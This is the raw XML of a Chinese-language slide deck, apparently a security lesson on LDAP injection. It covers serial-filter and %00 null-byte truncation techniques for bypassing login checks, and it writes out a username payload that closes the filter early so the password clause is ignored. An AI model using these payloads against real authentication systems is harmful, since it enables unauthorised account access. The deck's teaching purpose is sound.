          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367355" y="4345756"/>
            <a:ext cx="8239354" cy="180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与方法三很类似，只是截断依赖于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>而非解析器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00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的字符串终止符 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>编码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只要这个字符没有被过滤，即使语法校验严谨的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>环境也能绕过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1600" i="1" dirty="0"/>
              <a:t>另此方法同样需要猜中正确的账号使得永真式成立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40832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286108" y="62595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293230" y="61071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17157" y="322000"/>
            <a:ext cx="324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五种注入方式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FDCB577-045B-4B11-B9D5-A25ED897E15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292051" y="1595065"/>
            <a:ext cx="1" cy="161494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8B5B714-1280-4578-81C5-8721FAE562F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367355" y="1780390"/>
            <a:ext cx="906560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username  :  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ch25)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=ch25)) (&amp;(1=0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password   :  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payload      :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid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>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ch25)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=ch25)) (&amp;(1=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userPassword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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:cs typeface="Aldhabi" panose="01000000000000000000" pitchFamily="2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B2B0EE-ED37-4575-A198-D1D298A8B861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292051" y="1395010"/>
            <a:ext cx="606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方法五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： 串行过滤器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563AE8-575E-4B80-A7CF-B90F96C6EF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292052" y="3914626"/>
            <a:ext cx="290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分析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A31F4-F550-4C78-A655-60C9F712D615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1292052" y="4114681"/>
            <a:ext cx="0" cy="2117361"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0D8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D101128-DCC7-4183-94B0-C8415EC2118C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367354" y="4345756"/>
            <a:ext cx="9770693" cy="187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cs typeface="Aldhabi" panose="01000000000000000000" pitchFamily="2" charset="-78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此方法构造了两个过滤器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在语法校验不严谨的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>LDAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中，只会执行第一个过滤器  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(&amp;(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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ch25)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=ch25))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而第二个过滤器 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(&amp;(1=0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>userPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anyword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>则不会被执行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1600" i="1" dirty="0"/>
              <a:t>另此方法同样需要猜中正确的账号使得永真式成立</a:t>
            </a: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351063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748657" y="63979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638475" y="610718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17789" y="322000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By Pass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4D7B5B-512F-4505-95A1-F9D3DD85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68" y="1024615"/>
            <a:ext cx="5915909" cy="58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1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611</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>83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EXP</cp:lastModifiedBy>
  <cp:revision>157</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-07-27T07:00:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-25T08:40:39Z</dcterms:modified>
</cp:coreProperties>
</file>